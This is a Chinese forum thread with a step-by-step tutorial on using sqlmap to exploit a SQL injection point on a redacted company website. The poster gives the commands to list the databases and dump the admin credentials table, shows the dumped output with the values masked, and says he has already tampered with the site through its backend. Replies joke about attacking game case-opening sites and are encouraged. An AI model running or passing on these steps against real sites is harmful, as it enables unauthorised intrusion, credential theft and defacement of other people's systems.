论坛首页 › 视频教程 › 利用sqlmap进行渗透登录网站后台

LFFOX 发表于 2022-10-31 21:00:16

利用sqlmap进行渗透登录网站后台

本帖最后由 LFFOX 于 2022-10-31 21:02 编辑

[以防御为目的的渗透测试]
公司：XX科技集团
域名：XXX.cn
IP：122.XXX.XXX.XX
后台：http://XXXXX.COM/admin/main.php
SQL注入点：http://XXXXX.COM/index_set.php?id=1
数据库： information_schema qdm131253668_db

常识：有id就有可能有sql注入点


现在这个站点已经被我从后台篡改了，好废话不多说，开始教程
这个事情其实一个工具就能搞定了
那就是sqlmap
sqlmap是渗透中最常见工具，那具体该怎么使用呢？
[我这里使用的是kali linux 环境自带sqlmap，如果你是在Windows环境可以去sqlmap.org下载，下一节我会发sqlmap的安装教程]
sqlmap -u http://XXXXX.COM/index_set.php?id=1 -dbs
参数解释：-u指定要扫描的url   -dbs 列出所有数据库
然后我等它扫描完，我这边就出现了下面两个数据库 information_schema qdm131253668_db
不用管不用犹豫，直接选第二个列数据库表
sqlmap -u http://XXXXX.COM/index_set.php?id=1 -D qdm131253668_db --tables --dump

Database: qdm131253668_db                                                                              

+---------------------+
| calc_params         |
| p_admin             |
| p_comquotation      |
| p_comquotation_base |
| p_comsoftclass      |
| p_config            |
| p_down            |
| p_edusoftclass      |
| p_formula         |
| p_link            |
| p_msg               |
| p_newsbase          |
| p_newsclass         |
| p_newscontent       |
| p_set               |
| products            |
| quotations          |
+---------------------+

这是爆破出来的列表名 仔细看重点在p_admin列表，一般到这一步，看到ueser_name user admin 这些或者类似这些里面就会有账号和密码
但是这个本身是一个企业网站，就一个管理员账号
走到这一步我们继续往下走
sqlmap -u http://XXXXX.COM/index_set.php?id=1 -D qdm131253668_db -T p_admin --tables --dump
这个结果就有了账号和密码

+-----+------+-----------------+----------------------------------+----------+
| uid | m_id | name            | password                         | username |
+-----+------+-----------------+----------------------------------+----------+
| 1   | 1    | 不告诉你 | 不告诉你 | admin    |
+-----+------+-----------------+----------------------------------+----------+

这里的password和name我就不透露了，username 还是 常见的 admin
不过这里的password进行了md5加密，自己去解密一下就可以了
不要去恶意破坏他人网站
其实sqlmap的利用还有很多，还可以拿服务器的shell等等
自己去摸索吧，本期就到这里了
I'm not a hacker, I'm ... You guess?

阿森 发表于 2022-10-31 22:32:09

手机可以吗

LFFOX 发表于 2022-10-31 22:39:47

阿森 发表于 2022-10-31 22:32
手机可以吗

可以，下次出教程

525114833 发表于 2022-11-1 00:23:24

这可以渗透CSGO开箱网然后修改东西吗

弥彦 发表于 2022-11-1 03:28:38

525114833 发表于 2022-11-1 00:23
这可以渗透CSGO开箱网然后修改东西吗

可以很刑，哥们加油

LFFOX 发表于 2022-11-1 10:32:59

弥彦 发表于 2022-11-1 03:28
可以很刑，哥们加油

玩玩而已;P;P;P;P;P;P;P;P;P

LFFOX 发表于 2022-11-1 10:35:20

525114833 发表于 2022-11-1 00:23
这可以渗透CSGO开箱网然后修改东西吗

666666666666666666

525114833 发表于 2022-11-1 20:42:06

LFFOX 发表于 2022-11-1 10:35
666666666666666666

惩治那些坑钱的人:lol:lol:lol

LFFOX 发表于 2022-11-1 20:56:30

525114833 发表于 2022-11-1 20:42
惩治那些坑钱的人

哈哈哈，人家也是需要盈利的

2945310027 发表于 2022-11-7 21:06:59

LFFOX 发表于 2022-11-1 20:56
哈哈哈，人家也是需要盈利的

大哥有qq吗我有急事求求了

LFFOX 发表于 2022-11-7 21:24:45

2945310027 发表于 2022-11-7 21:06
大哥有qq吗我有急事求求了

我加你？

2945310027 发表于 2022-11-7 22:46:44

LFFOX 发表于 2022-11-7 21:24
我加你？

大哥加一下我vx可以吗jsryAC

qq1426542146 发表于 2023-4-2 21:54:08

谢谢博主，让我学到了一些这方面的知识，俺学校学的网络安全，但是俺是大专学校很水的，所以特别迷茫，只能在网上学习一下这方面的知识。谢谢博主

LFFOX 发表于 2023-4-3 11:13:49

qq1426542146 发表于 2023-4-2 21:54
谢谢博主，让我学到了一些这方面的知识，俺学校学的网络安全，但是俺是大专学校很水的，所以特别迷茫，只能 ...

这有什么谢的，我也只是一个初中生:'(

txy1978 发表于 2025-1-27 16:24:21

这个帖一般般，还可以哦。

查看完整版本: 利用sqlmap进行渗透登录网站后台